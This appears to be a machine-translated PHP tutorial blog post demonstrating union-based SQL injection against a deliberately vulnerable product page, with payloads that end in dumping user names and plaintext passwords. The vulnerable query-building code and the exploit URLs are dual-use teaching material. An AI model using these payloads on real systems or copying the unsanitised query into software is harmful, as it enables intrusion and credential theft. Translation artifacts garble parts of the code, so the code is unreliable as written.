This article introduces the content is a PHP SQL injection complete process, now share to everyone, there is a need for friends can refer to
I hope to help you. Many PHPer will encounter some problems and bottlenecks when they are advanced, and they have no sense of direction due to excessive business code writing. I have sorted out some information, including but not limited to: Distributed architecture, high scalability, high performance, high concurrency, server performance tuning, TP6, Laravel, YII2, Redis, Swoole, Swoft, Kafka, Mysql optimization, shell scripting, Docker, microservices, Nginx, etc.
Having learned some SQL injection skills, here is a simple practice for SQL injection in PHP+MYSQL
First look at two MYSQL tables
User record Form:
REATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default ' ',
`password` varchar(20) NOT NULL default ' ',
`userlevel` char(2) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, 'seven'.'seven_pwd'.'10');
INSERT INTO `php_user` VALUES (2, 'swons'.'swons_pwd'.' ');Copy the codeList of product records:
CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default ' ',
`price` float NOT NULL default '0',
`img` varchar(200) NOT NULL default ' ',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');Copy the codeThe following file is show_product.php to display the list of products. SQL injection also exploits SQL statement vulnerabilities in this file
<? php$conn = mysql_connect("localhost"."root"."root");
if(!$conn) {echo "Database connection error";
exit;
}
if(! mysql_select_db("phpsql")) {
echo "Error selecting database" . mysql_error();
exit;
}
$tempID=$_GET['id'];
if($tempID< = 0 | |! isset($tempID)) $tempID= 1;$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.'<br>';
$result = mysql_query($sql);
if (!$result) {
echo "Query error" . mysql_error();
exit;
}
if (mysql_num_rows($result) = = 0) {echo "No query result";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
echo 'ID:'.$row["id"].'<br>';
echo 'name:'.$row["name"].'<br>';
echo 'price:'.$row["price"].'<br>';
echo 'image:'.$row["img"].'<br>';
}
?>Copy the code$SQL = “SELECT * FROM php_product WHERE id =$tempID”;
$tempID gets from $_GET. We can construct the value of this variable for SQL injection purposes
Construct the following links respectively:
1, http://localhost/phpsql/index.php? id=1
You get the following output
SELECT * FROM php_product WHERE id =1 SELECT * FROM php_product WHERE id =1Copy the code// Get the product data list with ID 1
ID:1
name:name_1
Price: 12.2
image:images/name_1.jpg
2, http://localhost/phpsql/index.php? id=1 or 1=1
Get the output
SELECT * FROM php_product WHERE id =1 or 1=1Copy the code// There are two product information lists
ID:1
name:name_1
Price: 12.2
image:images/name_1.jpg
ID:2
name:name_2
Price: 35.25
image:images/name_2.jpg
Both 1 and 2 get the data list output, proving that the SQL statement was successfully executed
3, determine the number of data table fields
http://localhost/phpsql/index.php?id=1 union select 1,1,1,1
Get the output
SELECT * FROM php_product WHERE id =1 union SELECT 1,1,1,1Copy the code// Select all 1’s from union select.
ID:1
name:name_1
Price: 12.2
image:images/name_1.jpg
ID:1
name:1
price:1
image:1
4, determine the type of data table field
http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)
Get the output
SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)Copy the codeID:1
name:name_1
Price: 12.2
image:images/name_1.jpg
ID:0
name:A
price:0
image:A
Note the second record that if the following value is equal to A, this field matches the field type constructed after the Union query. Now after the union
Char (65), which is a string. After observation. You can see that the name and image fields are both strings
5. We got what we wanted:
http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user
Get the output:
SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user
// Output two user information, name is the user name, image is the user password.
ID:1
name:seven
price:1
image:seven_pwd
ID:1
name:swons
price:1
image:swons_pwd
Note that the ID=10000 in the URL is not to get the product information, but only the result of the following union query. In more practical cases, the value of ID is different
The username and password of the union must be placed in positions 2 and 4. In order to match the previous SELECT statement. This is the union query
Statement characteristics
Remark:
This simple injection method is more context-specific. It’s more complicated than that. But the principle is the same.
I hope the above content can help you. Many PHPer will encounter some problems and bottlenecks when they are advanced, and they have no sense of direction when writing too many business codes. I have sorted out some information, including but not limited to: Distributed architecture, high scalability, high performance, high concurrency, server performance tuning, TP6, Laravel, YII2, Redis, Swoole, Swoft, Kafka, Mysql optimization, shell scripting, Docker, microservices, Nginx, etc.